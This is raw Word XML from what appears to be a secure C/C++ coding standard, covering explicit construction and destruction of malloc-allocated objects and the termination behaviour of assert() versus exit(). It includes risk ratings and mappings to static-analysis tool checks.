                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>malloc(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(S));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156D664D"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S *s = new (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ptr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>S;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="20FA533E"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E583F00"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s-&gt;f(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5A75B5CB"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70CC21EE"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s-&gt;~S(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="623EAAF5" w14:textId="77777777" w:rsidR="00D14250" w:rsidRPr="00D14250" w:rsidRDefault="00D14250" w:rsidP="00D14250">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>free(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ptr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D14250">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681B4B09" w14:textId="193170D1" w:rsidR="00F72634" w:rsidRPr="00D14250" w:rsidRDefault="00D14250" w:rsidP="00D14250">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1425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32964C5A" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007E1C77" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Keep It Simple</w:t>
            </w:r>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – when not explicitly constructing and destructing manually managed objects, complexity is greatly increased. Explicit statements will simplify the process and prevent errors from occurring.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1A3C43" w14:paraId="63DEB54B" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="265C59C7" w14:textId="2270AAC1" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FECF226" w14:textId="36B699CD" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001260E5" w14:textId="5C95BD9D" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1BD06F" w14:textId="1FF61A15" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="321828B7" w14:textId="7BB4029D" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">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A3C43" w14:paraId="03937464" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="699288A5" w14:textId="7B27557F" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId36" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35911E79" w14:textId="5AE35F21" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B4ADD74" w14:textId="33A99BEF" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>C++4761, C++4762, C++4766, C++4767</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="221E6849" w14:textId="0CCFE61C" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="433579AD" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AE4D8D3" w14:textId="1A7E1FE4" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId37"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485EEED8" w14:textId="7BD6F52D" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CFDA649" w14:textId="182C615A" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>CERT_CPP-MEM53-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E14C36" w14:textId="77C104E6" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>Do not invoke malloc/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001A3C43">
              <w:t>realloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001A3C43">
              <w:t xml:space="preserve"> for objects having constructors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A3C43" w14:paraId="092940EA" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7589B551" w14:textId="0A2D7C3E" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId38" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>PVS-Studio</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EFDCB9A" w14:textId="4E1FBB3B" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:r w:rsidRPr="001A3C43">
              <w:t>7.07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2978B16E" w14:textId="7168A3EC" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43">
            <w:hyperlink r:id="rId39" w:history="1">
              <w:r w:rsidRPr="001A3C43">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>V749</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163BA4AD" w14:textId="56657970" w:rsidR="001A3C43" w:rsidRPr="001A3C43" w:rsidRDefault="001A3C43" w:rsidP="001A3C43"/>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1FCA978" w:rsidR="00381847" w:rsidRDefault="00CE3AA7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Understand the termination behavior of assert() and abort()</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2FC6A99" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="003F364F">
              <w:t>ERR</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="003F364F">
              <w:t>006</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="003F364F">
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33ACFFEA" w14:textId="0D93509A" w:rsidR="00381847" w:rsidRDefault="00CE3AA7">
            <w:r>
              <w:t xml:space="preserve">Because assert calls abort(), cleanup functions register with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>atexit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>() are not called. This can lead to errors in correct termination of the program leading to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25BA3BA" w:rsidR="00F72634" w:rsidRDefault="003F364F" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">A function that is called </w:t>
            </w:r>
            <w:r w:rsidR="00CE3AA7">
              <w:t>before the program exits to clean up. The assert function if failed will exit before cleanup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="058CAEAA" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1FF08CD9"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void cleanup(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A581C66"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 Delete temporary files, restore consistent state, etc. */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51465E67"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A07E19"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F122F0C"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int main(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47A3880C"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if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>atexit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(cleanup) != 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A70009"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 Handle error */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB944A5"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A8B2C95"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083A2447"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 ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="398E6A98"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279C28E7"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assert(/* Something bad didn't happen */</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003F364F">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2CD9FE09"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41F36A20"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 ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28BA138C" w14:textId="323B12B6" w:rsidR="00F72634" w:rsidRPr="003F364F" w:rsidRDefault="003F364F" w:rsidP="003F364F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F364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3E9607C" w:rsidR="00F72634" w:rsidRDefault="00CE3AA7" w:rsidP="0015146B">
            <w:r>
              <w:t>If statements are used in place of assert to allow the cleanup to occur and ensure proper termination routines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="2DA5938A" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="418631A9"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void</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>cleanup(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="542BF344"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 Delete temporary files, restore consistent state, etc. */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35204D7F"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3349DA27"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Fonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3342DBEA"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b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>main(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26FB805E"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if</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>atexit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(cleanup) != 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19786041"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 Handle error */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A1169BE"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4912667B"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Fonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F248F5"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 ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E5DBC3"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Fonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B2C8BE0"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if</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(/* Something bad happened */) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56FEE784" w14:textId="77777777" w:rsidR="00CE3AA7" w:rsidRPr="00CE3AA7" w:rsidRDefault="00CE3AA7" w:rsidP="00CE3AA7">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>    </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>exit</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(EXIT_FAILURE</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CE3AA7">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0C049650" w14:textId="77777777" w:rsidR="00CE3AA7" w:rsidRDefault="00CE3AA7" w:rsidP="00CE3A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p>
